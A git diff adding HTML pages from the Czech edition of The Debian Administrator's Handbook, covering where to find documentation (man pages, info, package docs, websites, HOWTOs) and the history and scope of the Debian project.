+            href="sect.common-procedures.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="solving-problems"></a>Kapitola 7. Solving Problems and Finding Relevant Information</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="solving-problems.html#sect.documentation-sources">7.1. Documentation Sources</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="solving-problems.html#sect.manual-pages">7.1.1. Manual Pages</a></span></dt><dt><span
+                    class="section"><a
+                      href="solving-problems.html#id-1.10.4.5">7.1.2. <span
+                        class="emphasis"><em>info</em></span> Documents</a></span></dt><dt><span
+                    class="section"><a
+                      href="solving-problems.html#id-1.10.4.6">7.1.3. Specific Documentation</a></span></dt><dt><span
+                    class="section"><a
+                      href="solving-problems.html#id-1.10.4.7">7.1.4. Websites</a></span></dt><dt><span
+                    class="section"><a
+                      href="solving-problems.html#id-1.10.4.8">7.1.5. Tutorials (<span
+                        class="emphasis"><em>HOWTO</em></span>)</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.common-procedures.html">7.2. Common Procedures</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.common-procedures.html#id-1.10.5.5">7.2.1. Configuring a Program</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.common-procedures.html#id-1.10.5.6">7.2.2. Monitoring What Daemons Are Doing</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.common-procedures.html#id-1.10.5.7">7.2.3. Asking for Help on a Mailing List</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.common-procedures.html#id-1.10.5.8">7.2.4. Reporting a Bug When a Problem Is Too Difficult</a></span></dt></dl></dd></dl></div><div
+          class="highlights"><div
+            class="para">
+		For an administrator, the most important skill is to be able to cope with any situation, known or unknown. This chapter gives a number of methods that will — hopefully — allow you to isolate the cause of any problem that you will encounter, so that you may be able to resolve them.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.documentation-sources"></a>7.1. Documentation Sources</h2></div></div></div><a
+            id="id-1.10.4.2"
+            class="indexterm"></a><div
+            class="para">
+			Before you can understand what is really going on when there is a problem, you need to know the theoretical role played by each program involved in the problem. To do this, the best reflex to have is consult their documentation; but since these documentations are many and can be scattered far and wide, you should know all the places where they can be found.
+		</div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.manual-pages"></a>7.1.1. Manual Pages</h3></div></div></div><a
+              id="id-1.10.4.4.2"
+              class="indexterm"></a><a
+              id="id-1.10.4.4.3"
+              class="indexterm"></a><a
+              id="id-1.10.4.4.4"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CULTURE</em></span> <acronym
+                          class="acronym">RTFM</acronym></strong></p></div></div></div><a
+                id="id-1.10.4.4.5.2"
+                class="indexterm"></a><div
+                class="para">
+				This acronym stands for “Read the F***ing Manual”, but can also be expanded in a friendlier variant, “Read the Fine Manual”. This phrase is sometimes used in (terse) responses to questions from newbies. It is rather abrupt, and betrays a certain annoyance at a question asked by someone who has not even bothered to read the documentation. Some say that this classic response is better than no response at all (since it indicates that the documentation contains the information sought), or than a more verbose and angry answer.
+			</div><div
+                class="para">
+				In any case, if someone responds “RTFM” to you, it is often wise not to take offense. Since this answer may be perceived as vexing, you might want to try and avoid receiving it. If the information that you need is not in the manual, which can happen, you might want to say so, preferably in your initial question. You should also describe the various steps that you have personally taken to find information before you raised a question on a forum. Following Eric Raymond's guidelines is a good way to avoid the most common mistakes and get useful answers. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://catb.org/~esr/faqs/smart-questions.html">http://catb.org/~esr/faqs/smart-questions.html</a></div>
+			</div></div><div
+              class="para">
+				Manual pages, while relatively terse in style, contain a great deal of essential information. We will quickly go over the command for viewing them. Simply type <code
+                class="command">man <em
+                  class="replaceable">manual-page</em></code> — the manual page usually goes by the same name as the command whose documentation is sought. For example, to learn about the possible options for the <code
+                class="command">cp</code> command, you would type the <code
+                class="command">man cp</code> command at the shell prompt (see sidebar <a
+                class="xref"
+                href="solving-problems.html#sidebar.shell"><span
+                  class="emphasis"><em>BACK TO BASICS</em></span> The shell, a command line interpreter</a>).
+			</div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.shell"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BACK TO BASICS</em></span> The shell, a command line interpreter</strong></p></div></div></div><a
+                id="id-1.10.4.4.7.2"
+                class="indexterm"></a><a
+                id="id-1.10.4.4.7.3"
+                class="indexterm"></a><div
+                class="para">
+				A command line interpreter, also called a “shell”, is a program that executes commands that are either entered by the user or stored in a script. In interactive mode, it displays a prompt (usually ending in <code
+                  class="literal">$</code> for a normal user, or by <code
+                  class="literal">#</code> for an administrator) indicating that it is ready to read a new command. <a
+                  class="xref"
+                  href="short-remedial-course.html">B – „<em>Short Remedial Course</em>“</a> describes the basics of using the shell.
+			</div><div
+                class="para">
+				The default and most commonly used shell is <code
+                  class="command">bash</code> (Bourne Again SHell), but there are others, including <code
+                  class="command">dash</code>, <code
+                  class="command">csh</code>, <code
+                  class="command">tcsh</code> and <code
+                  class="command">zsh</code>.
+			</div><div
+                class="para">
+				Among other things, most shells offer help during input at the prompt, such as the completion of command or file names (which you can generally activate by pressing the <span
+                  class="keycap"><strong>tab</strong></span> key), or recalling previous commands (history management).
+			</div></div><div
+              class="para">
+				Man pages not only document programs accessible from the command line, but also configuration files, system calls, C library functions, and so forth. Sometimes names can collide. For example, the shell's <code
+                class="command">read</code> command has the same name as the <code
+                class="function">read</code> system call. This is why manual pages are organized in numbered sections:
+			</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="orderedlist"><ol><li
+                  class="listitem"><div
+                    class="para">
+						commands that can be executed from the command line;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						system calls (functions provided by the kernel);
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						library functions (provided by system libraries);
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						devices (on Unix-like systems, these are special files, usually placed in the <code
+                      class="filename">/dev/</code> directory);
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						configuration files (formats and conventions);
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						games;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						sets of macros and standards;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						system administration commands;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						kernel routines.
+					</div></li></ol></div><div
+              class="para">
+				It is possible to specify the section of the manual page that you are looking for: to view the documentation for the <code
+                class="function">read</code> system call, you would type <code
+                class="command">man 2 read</code>. When no section is explicitly specified, the first section that has a manual page with the requested name will be shown. Thus, <code
+                class="command">man shadow</code> returns <span
+                class="citerefentry"><span
+                  class="refentrytitle">shadow</span>(5)</span> because there are no manual pages for <span
+                class="foreignphrase"><em
+                  class="foreignphrase">shadow</em></span> in sections 1 to 4.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TIP</em></span> <code
+                          class="command">whatis</code></strong></p></div></div></div><a
+                id="id-1.10.4.4.11.2"
+                class="indexterm"></a><div
+                class="para">
+				If you do not want to look at the full manual page, but only a short description to confirm that it is what you are looking for, simply enter <code
+                  class="command">whatis <em
+                    class="replaceable">command</em></code>.
+			</div><pre
+                class="screen">
+<code
+                  class="computeroutput">$ </code><strong
+                  class="userinput"><code>whatis scp</code></strong>
+<code
+                  class="computeroutput">scp (1)     - secure copy (remote file copy program)</code></pre><div
+                class="para">
+				This short description is included in the <span
+                  class="emphasis"><em>NAME</em></span> section at the beginning of all manual pages.
+			</div></div><div
+              class="para">
+				Of course, if you do not know the names of the commands, the manual is not going to be of much use to you. This is the purpose of the <code
+                class="command">apropos</code> command, which helps you conduct a search in the manual pages, or more specifically in their short descriptions. Each manual page begins essentially with a one line summary. <code
+                class="command">apropos</code> returns a list of manual pages whose summary mentions the requested keyword(s). If you choose them well, you will find the name of the command that you need.
+			</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.10.4.4.13"></a><p
+                class="title"><strong>Příklad 7.1. Finding <code
+                    class="command">cp</code> with <code
+                    class="command">apropos</code></strong></p><div
+                class="example-contents"><pre
+                  class="screen">
+<code
+                    class="computeroutput">$ </code><strong
+                    class="userinput"><code>apropos "copy file"</code></strong>
+<code
+                    class="computeroutput">cp (1)               - copy files and directories
+cpio (1)             - copy files to and from archives
+gvfs-copy (1)        - Copy files
+gvfs-move (1)        - Copy files
+hcopy (1)            - copy files from or to an HFS volume
+install (1)          - copy files and set attributes
+ntfscp (8)           - copy file to an NTFS volume.
+</code></pre></div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TIP</em></span> Browsing by following links</strong></p></div></div></div><div
+                class="para">
+				Many manual pages have a “SEE ALSO” section, usually at the end. It refers to other manual pages relevant to similar commands, or to external documentation. In this way, it is possible to find relevant documentation even when the first choice is not optimal.
+			</div></div><div
+              class="para">
+				The <code
+                class="command">man</code> command is not the only means of consulting the manual pages, since <code
+                class="command">khelpcenter</code> and <code
+                class="command">konqueror</code> (by KDE) and <code
+                class="command">yelp</code> (under GNOME) programs also offer this possibility. There is also a web interface, provided by the <code
+                class="command">man2html</code> package, which allows you to view manual pages in a web browser. On a computer where this package is installed, use this URL: <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://localhost/cgi-bin/man/man2html">http://localhost/cgi-bin/man/man2html</a></div>
+			</div><div
+              class="para">
+				This utility requires a web server. This is why you should choose to install this package on one of your servers: all users of the local network could benefit from this service (including non-Linux machines), and this will allow you not to set up an HTTP server on each workstation. If your server is also accessible from other networks, it may be desirable to restrict access to this service only to users of the local network.
+			</div><a
+              id="id-1.10.4.4.17"
+              class="indexterm"></a><div
+              class="para">
+				Last but not least, you can view all manual pages available in Debian (even those that are not installed on your machine) on the <code
+                class="literal">manpages.debian.org</code> service. It offers each manual page in multiple versions, one for each Debian release. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://manpages.debian.org">https://manpages.debian.org</a></div>
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>DEBIAN POLICY</em></span> Required man pages</strong></p></div></div></div><div
+                class="para">
+				Debian requires each program to have a manual page. If the upstream author does not provide one, the Debian package maintainer will usually write a minimal page that will at the very least direct the reader to the location of the original documentation.
+			</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.10.4.5"></a>7.1.2. <span
+                      class="emphasis"><em>info</em></span> Documents</h3></div></div></div><a
+              id="id-1.10.4.5.2"
+              class="indexterm"></a><a
+              id="id-1.10.4.5.3"
+              class="indexterm"></a><div
+              class="para">
+				The GNU project has written manuals for most of its programs in the <span
+                class="emphasis"><em>info</em></span> format; this is why many manual pages refer to the corresponding <span
+                class="emphasis"><em>info</em></span> documentation. This format offers some advantages, but the default program to view these documents (it is called <code
+                class="command">info</code>) is also slightly more complex. You would be well advised to use <code
+                class="command">pinfo</code> instead (from the <span
+                class="pkg pkg">pinfo</span> package).
+			</div><a
+              id="id-1.10.4.5.5"
+              class="indexterm"></a><div
+              class="para">
+				The <span
+                class="emphasis"><em>info</em></span> documentation has a hierarchical structure, and if you invoke <code
+                class="command">pinfo</code> without parameters, it will display a list of the nodes available at the first level. Usually, nodes bear the name of the corresponding commands.
+			</div><div
+              class="para">
+				With <code
+                class="command">pinfo</code> navigating between these nodes is easy to achieve with the arrow keys. Alternatively, you could also use a graphical browser, which is a lot more user-friendly. Again, <code
+                class="command">konqueror</code> and <code
+                class="command">yelp</code> work; the <code
+                class="command">info2www</code> also provides a web interface. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://localhost/cgi-bin/info2www">http://localhost/cgi-bin/info2www</a></div>
+			</div><a
+              id="id-1.10.4.5.8"
+              class="indexterm"></a><div
+              class="para">
+				Note that the <span
+                class="emphasis"><em>info</em></span> system is not suitable for translation, unlike the <code
+                class="command">man</code> page system. <span
+                class="emphasis"><em>info</em></span> documents are thus almost always in English. However, when you ask the <code
+                class="command">pinfo</code> program to display a non-existing <span
+                class="emphasis"><em>info</em></span> page, it will fall back on the <span
+                class="emphasis"><em>man</em></span> page by the same name (if it exists), which might be translated.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.10.4.6"></a>7.1.3. Specific Documentation</h3></div></div></div><a
+              id="id-1.10.4.6.2"
+              class="indexterm"></a><div
+              class="para">
+				Each package includes its own documentation. Even the least well documented programs generally have a <code
+                class="filename">README</code> file containing some interesting and/or important information. This documentation is installed in the <code
+                class="filename">/usr/share/doc/<em
+                  class="replaceable">package</em>/</code> directory (where <em
+                class="replaceable">package</em> represents the name of the package). If the documentation is particularly large, it may not be included in the program's main package, but might be offloaded to a dedicated package which is usually named <code
+                class="literal"><em
+                  class="replaceable">package</em>-doc</code>. The main package generally recommends the documentation package so that you can easily find it.
+			</div><a
+              id="id-1.10.4.6.4"
+              class="indexterm"></a><a
+              id="id-1.10.4.6.5"
+              class="indexterm"></a><a
+              id="id-1.10.4.6.6"
+              class="indexterm"></a><div
+              class="para">
+				The <code
+                class="filename">/usr/share/doc/<em
+                  class="replaceable">package</em>/</code> directory also contains some files provided by Debian which complete the documentation by specifying the package's particularities or improvements compared to a traditional installation of the software. The <code
+                class="filename">README.Debian</code> file also indicates all of the adaptations that were made to comply with the Debian Policy. The <code
+                class="filename">changelog.Debian.gz</code> file allows the user to follow the modifications made to the package over time: it is very useful to try to understand what has changed between two installed versions that do not have the same behavior. Finally, there is sometimes a <code
+                class="filename">NEWS.Debian.gz</code> file which documents the major changes in the program that may directly concern the administrator.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.10.4.7"></a>7.1.4. Websites</h3></div></div></div><div
+              class="para">
+				In most cases, free software programs have websites that are used to distribute it and to bring together the community of its developers and users. These sites are frequently loaded with relevant information in various forms: official documentation, FAQ (Frequently Asked Questions), mailing list archives, etc. Problems that you may encounter have often already been the subject of many questions; the FAQ or mailing list archives may have a solution for it. A good mastery of search engines will prove immensely valuable to find relevant pages quickly (by restricting the search to the Internet domain or sub-domain dedicated to the program). If the search returns too many pages or if the results do not match what you seek, you can add the keyword <strong
+                class="userinput"><code>debian</code></strong> to limit results and target relevant information.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TIPS</em></span> From error to solution</strong></p></div></div></div><div
+                class="para">
+				If the software returns a very specific error message, enter it into the search engine (between double quotes, <code
+                  class="literal">"</code>, in order to search not for individual keywords, but for the complete phrase). In most cases, the first links returned will contain the answer that you need.
+			</div><div
+                class="para">
+				In other cases, you will get very general errors, such as “Permission denied”. In this case, it is best to check the permissions of the elements involved (files, user ID, groups, etc.).
+			</div></div><div
+              class="para">
+				If you do not know the address for the software's website, there are various means of getting it. First, check if there is a <code
+                class="literal">Homepage</code> field in the package's meta-information (<code
+                class="command">apt show <em
+                  class="replaceable">package</em></code>). Alternately, the package description may contain a link to the program's official website. If no URL is indicated, look at <code
+                class="filename">/usr/share/doc/<em
+                  class="replaceable">package</em>/copyright</code>. The Debian maintainer generally indicates in this file where they got the program's source code, and this is likely to be the website that you need to find. If at this stage your search is still unfruitful, consult a free software directory, such as FSF's Free Software Directory, or search directly with a search engine, such as Google, DuckDuckGo, Yahoo, etc. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://directory.fsf.org/wiki/Main_Page">https://directory.fsf.org/wiki/Main_Page</a></div>
+			</div><a
+              id="id-1.10.4.7.5"
+              class="indexterm"></a><a
+              id="id-1.10.4.7.6"
+              class="indexterm"></a><div
+              class="para">
+				You might also want to check the Debian wiki, a collaborative website where anybody, even simple visitors, can make suggestions directly from their browsers. It is used equally by developers who design and specify their projects, and by users who share their knowledge by writing documents collaboratively. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://wiki.debian.org/">http://wiki.debian.org/</a></div>
+			</div><a
+              id="id-1.10.4.7.8"
+              class="indexterm"></a></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.10.4.8"></a>7.1.5. Tutorials (<span
+                      class="emphasis"><em>HOWTO</em></span>)</h3></div></div></div><a
+              id="id-1.10.4.8.2"
+              class="indexterm"></a><div
+              class="para">
+				A howto is a document that describes, in concrete terms and step by step, “how to” reach a predefined goal. The covered goals are relatively varied, but often technical in nature: for example, setting up IP Masquerading, configuring software RAID, installing a Samba server, etc. These documents often attempt to cover all of the potential problems likely to occur during the implementation of a given technology.
+			</div><div
+              class="para">
+				Many such tutorials are managed by the Linux Documentation Project (LDP), whose website hosts all of these documents: <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.tldp.org/">http://www.tldp.org/</a></div>
+			</div><a
+              id="id-1.10.4.8.5"
+              class="indexterm"></a><a
+              id="id-1.10.4.8.6"
+              class="indexterm"></a><div
+              class="para">
+				These documents should be taken with a grain of salt. They are often several years old; the information they contain is sometimes obsolete. This phenomenon is even more frequent for their translations, since updates are neither systematic nor instant after the publication of a new version of the original documents. This is part of the joys of working in a volunteer environment and without constraints…
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.searching-packages.html"><strong>Předcházející</strong>6.9. Searching for Packages</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.common-procedures.html"><strong>Další</strong>7.2. Common Procedures</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/the-debian-project.html b/tmp/cs-CZ/html/the-debian-project.html
new file mode 100644
index 000000000..2b825ec26
--- /dev/null
+++ b/tmp/cs-CZ/html/the-debian-project.html
@@ -0,0 +1,345 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 1. Projekt Debian</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Cíl, Prostředky, Operace, Dobrovolník" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.acknowledgments.html"
+        title="5. Poděkování" /><link
+        rel="next"
+        href="sect.foundation-documents.html"
+        title="1.2. Dokumenty nadace" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/the-debian-project.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.acknowledgments.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.foundation-documents.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="the-debian-project"></a>Kapitola 1. Projekt Debian</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="the-debian-project.html#sect.what-is-debian">1.1. Co je Debian?</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="the-debian-project.html#id-1.4.4.8">1.1.1. Multiplatformní operační systém</a></span></dt><dt><span
+                    class="section"><a
+                      href="the-debian-project.html#id-1.4.4.9">1.1.2. Kvalita svobodného softwaru</a></span></dt><dt><span
+                    class="section"><a
+                      href="the-debian-project.html#id-1.4.4.10">1.1.3. Právní rámec: nezisková organizace</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.foundation-documents.html">1.2. Dokumenty nadace</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.foundation-documents.html#sect.social-contract">1.2.1. Závazek vůči uživatelům</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.foundation-documents.html#sect.dfsg">1.2.2. Pokyny Debianu pro svobodný software</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.debian-internals.html">1.3. Vnitřní fungování projektu Debian</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.debian-internals.html#id-1.4.6.5">1.3.1. Vývojáři Debianu</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.debian-internals.html#id-1.4.6.6">1.3.2. Aktivní role uživatelů</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.debian-internals.html#id-1.4.6.7">1.3.3. Týmy a podprojekty</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.follow-debian-news.html">1.4. Follow Debian News</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.role-of-distributions.html">1.5. The Role of Distributions</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.role-of-distributions.html#id-1.4.8.4">1.5.1. The Installer: <code
+                        class="command">debian-installer</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.role-of-distributions.html#id-1.4.8.5">1.5.2. The Software Library</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.release-lifecycle.html">1.6. Lifecycle of a Release</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.release-lifecycle.html#id-1.4.9.11">1.6.1. The <span
+                        class="distribution distribution">Experimental</span> Status</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.release-lifecycle.html#id-1.4.9.12">1.6.2. The <span
+                        class="distribution distribution">Unstable</span> Status</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.release-lifecycle.html#id-1.4.9.13">1.6.3. Migration to <span
+                        class="distribution distribution">Testing</span></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.release-lifecycle.html#id-1.4.9.14">1.6.4. The Promotion from <span
+                        class="distribution distribution">Testing</span> to <span
+                        class="distribution distribution">Stable</span></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.release-lifecycle.html#id-1.4.9.15">1.6.5. The <span
+                        class="distribution distribution">Oldstable</span> and <span
+                        class="distribution distribution">Oldoldstable</span> Status</a></span></dt></dl></dd></dl></div><div
+          class="highlights"><div
+            class="para">
+		Než se ponoříme přímo do technologie, pojďme se podívat na to, co to je projekt Debian, jeho cíle, jeho prostředky a jeho provoz.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.what-is-debian"></a>1.1. Co je Debian?</h2></div></div></div><a
+            id="id-1.4.4.2"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> Origin of the Debian name</strong></p></div></div></div><div
+              class="para">
+			Nehledejte dále: Debian není zkratka. Tento název je ve skutečnosti spojení dvou křestních jmen: a to Iana Murdocka, a v té době jeho přítelkyně, Debry. Debra + Ian = Debian.
+		</div></div><div
+            class="para">
+			Debian je distribuce GNU/Linuxu. O tom, co to je distribuce budeme diskutovat podrobněji v části <a
+              class="xref"
+              href="sect.role-of-distributions.html">1.5 – „The Role of Distributions“</a>, ale nyní budeme jednoduše konstatovat, že se jedná o kompletní operační systém, včetně softwaru a systémů pro instalaci a řízení, vše na základě Linuxového jádra a svobodného softwaru (zejména z projektu GNU).
+		</div><div
+            class="para">
+			Když v roce 1993, pod vedením FSF, vytvořil Debian, měl Ian Murdock jasné cíle, které vyjádřil v <span
+              class="emphasis"><em>Manifestu Debianu</em></span>. Svobodný operační systém, o který usiloval, musel mít dva hlavní rysy. Za prvé, kvalitu: Debian musí být vyvinut s největší péčí, aby byl hoden linuxového jádra. Musí být rovněž nekomerční distribucí, která dostatečně věrohodně konkuruje velkým komerčním distribucím. Této dvojí ambice by bylo v jeho očích možné dosáhnout pouze otevřením procesu vývoje Debianu, stejně jako v případě Linuxu a projektu GNU. Vzájemná kontrola by tedy neustále tento produkt zlepšovala.
+		</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>KULTURA</em></span> GNU, projekt od FSF</strong></p></div></div></div><a
+              id="id-1.4.4.6.2"
+              class="indexterm"></a><a
+              id="id-1.4.4.6.3"
+              class="indexterm"></a><div
+              class="para">
+			Projekt GNU je řada svobodného softwaru vyvíjeného nebo sponzorovaného nadací Free Software Foundation (FSF), založené svým kultovním vůdcem, Dr. Richardem M. Stallmanem. GNU je rekurzivní zkratka znamenající “GNU Není Unix”.
+		</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>KULTURA</em></span> Richard Stallman</strong></p></div></div></div><a
+              id="id-1.4.4.7.2"
+              class="indexterm"></a><a
+              id="id-1.4.4.7.3"
+              class="indexterm"></a><div
+              class="para">
+			<acronym
+                class="acronym">FSF</acronym>'s founder and author of the GPL license, Richard M. Stallman (often referred to by his initials, RMS) is a charismatic leader of the Free Software movement. Due to his uncompromising positions, he is not unanimously admired, but his non-technical contributions to Free Software (in particular at the legal and philosophical level) are respected by everybody.
+		</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.4.4.8"></a>1.1.1. Multiplatformní operační systém</h3></div></div></div><a
+              id="id-1.4.4.8.2"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>Společenství</em></span> cesta Iana Murdocka</strong></p></div></div></div><a
+                id="id-1.4.4.8.3.2"
+                class="indexterm"></a><a
+                id="id-1.4.4.8.3.3"
+                class="indexterm"></a><a
+                id="id-1.4.4.8.3.4"
+                class="indexterm"></a><div
+                class="para">
+				Ian Murdock, zakladatel projektu Debian, byl jeho první vůdce od roku 1993 do roku 1996. Po předání štafety Bruceu Perensovi zhostil se Ian méně veřejné role. Vrátil se do práce v zákulisí společenství Svobodného softwaru vytvořením firmy Progeny, se záměrem prodávat distribuci odvozenou z Debianu. Tento podnik se stal, bohužel, obchodním nezdarem a vývoj byl ukončen. Společnost, po několika letech přežívání, pouze jako poskytovatel služeb, nakonec v dubnu 2007 vyhlásil bankrot. Z různých projektů započaté Progeny, pouze <span
+                  class="emphasis"><em>discover </em></span> stále zůstává. Jedná se o automatický nástroj pro detekci hardwaru.
+			</div><div
+                class="para">
+				Ian Murdock died on 28 December 2015 in San Francisco after a series of worrying tweets where he reported having been assaulted by police. In July 2016 it was announced that his death had been ruled a suicide.
+			</div></div><div
+              class="para">
+				Debian, remaining true to its initial principles, has had so much success that, today, it has reached a tremendous size. The 12 architectures offered cover 10 hardware architectures and 2 kernels (Linux and FreeBSD, although the FreeBSD-based ports are not part of the set of officially supported architectures). Furthermore, with more than 25,000 source packages, the available software can meet almost any need that one could have, whether at home or in the enterprise.
+			</div><div
+              class="para">
+				The sheer size of the distribution can be inconvenient: it is really unreasonable to distribute 14 DVD-ROMs to install a complete version on a standard PC… This is why Debian is increasingly considered as a “meta-distribution”, from which one extracts more specific distributions intended for a particular public: Debian-Desktop for traditional office use, Debian-Edu for education and pedagogical use in an academic environment, Debian-Med for medical applications, Debian-Junior for young children, etc. A more complete list of the subprojects can be found in the section dedicated to that purpose, see <a
+                class="xref"
+                href="sect.debian-internals.html#sect.sub-projects">1.3.3.1 – „Současné podprojekty Debianu“</a>.
+			</div><div
+              class="para">
